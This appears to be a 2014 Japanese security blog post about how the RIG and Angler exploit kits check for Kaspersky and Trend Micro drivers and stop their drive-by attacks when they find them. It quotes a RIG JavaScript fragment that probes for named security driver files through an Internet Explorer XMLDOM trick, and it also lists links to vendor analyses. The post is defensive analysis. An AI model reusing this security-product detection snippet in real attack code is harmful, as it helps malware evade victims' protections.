ノートパソコン dynabook が 
8万円から♪エクスプロイトキットがウイルス感染攻撃を停止 カスペルスキー&トレンドマイクロ利用者
{{{ 2014年8月2日 }}}
ドライブバイ・ダウンロード攻撃で利用される エクスプロイトキット(Anger、RIG)に、特定のセキュリティソフトの有無をわざわざチェックして攻撃処理を停止させる~? 
● Angler Exploit Kit drive by attack (June 25, 2014) (Dell SonicWALL)
https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=694
● De-obfuscating the DOM based JavaScript obfuscation found in EK’s such as Fiesta and Rig (Zscaler)
http://research.zscaler.com/2014/07/de-obfuscating-dom-based-javascript.html
● Rig Exploit Kit Used in Recent Website Compromise (Symantec)
http://www.symantec.com/connect/blogs/rig-exploit-kit-used-recent-website-compromise
● Attackers abusing Internet Explorer to enumerate software and detect security products (AlienVault)
http://www.alienvault.com/open-threat-exchange/blog/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi
● Malvertising campaign on popular site leads to Silverlight exploit, Zeus Trojan (Malwarebytes)
http://blog.malwarebytes.org/exploits-2/2014/05/malvertising-campaign-on-popular-site-leads-to-silverlight-exploit-zeus-trojan/
手元で確認した RIG Exploit Pack のJavaScriptコードから該当処理の部分を引っ張ってくる…
<script>/*s67ad68sdf*/ sdf43w='body'; var as42 = "asdsd44fsdfs12496765447192df";function df3z(txt){var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");xmlDoc.async = true;xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + txt + '">');if (xmlDoc.parseError.errorCode != 0){var err = "Error Code: " + xmlDoc.parseError.errorCode + "\ n";err += "Error Reason: " + xmlDoc.parseError.reason;err += "Error Line: " + xmlDoc.parseError.line;if (err.indexOf("-2147023083") > 0){return 1;}else {return 0;}}return 0;}var as60 = "asdsd32fsdfs67856511563248df";function sleep(milliseconds){var start = new Date().getTime(), c = true;while (c){if ((new Date().getTime() - start) > milliseconds){c = false;break ;}}}for (var l = 0; l < 50; l ++ ){if (df3z("c:\\Windows\\System32\\drivers\\kl1.sys") || df3z("c:\\windows\\system32\\drivers\\tmactmon.sys") || df3z("c:\\windows\\system32\\drivers\\tmcomm.sys") || df3z("c:\\windows\\system32\\drivers\\tmevtmgr.sys") || df3z("c:\\windows\\system32\\drivers\\TMEBC32.sys") || df3z("c:\\windows\\system32\\drivers\\tmeext.sys") || df3z("c:\\windows\\system32\\drivers\\tmnciesc.sys") || df3z("c:\\windows\\system32\\drivers\\tmtdi.sys")){window.abc = true;};sleep(20);}if(window.abc!=true){/*s62ad14sdf*/fghjs = String;}/*s15ad42sdf*/</script>
Windowsのシステムに存在するセキュリティ会社由来のドライバファイルをチェックしてます。なぜこの2つが選ばれたのか…? ファンなのかね? 
◆ カスペルスキー ... kl1.sys
◆ トレンドマイクロ(ウイルスバスター) ... tmactmon.sys tmcomm.sys tmevtmgr.sys TMEBC32.sys tmeext.sys tmnciesc.sys tmtdi.sys
(記事を書いてる時点で)RIG Exploit Pack がウイルスの強制インストールに悪用してくる脆弱性は、定番4系統の中で赤で示した旧バージョンになります。
《1》 Java
《2》 Adobe Reader
《3》 Adobe Flash Player
《4》 Microsoft関連 (Windows OS、Internet Explorer、Silverlight、Office など)
《2》 Adobe Reader
《3》 Adobe Flash Player
《4》 Microsoft関連 (Windows OS、Internet Explorer、Silverlight、Office など)
ブラウザそのものの脆弱性ではなく、ブラウザアドオンを狙ってます。
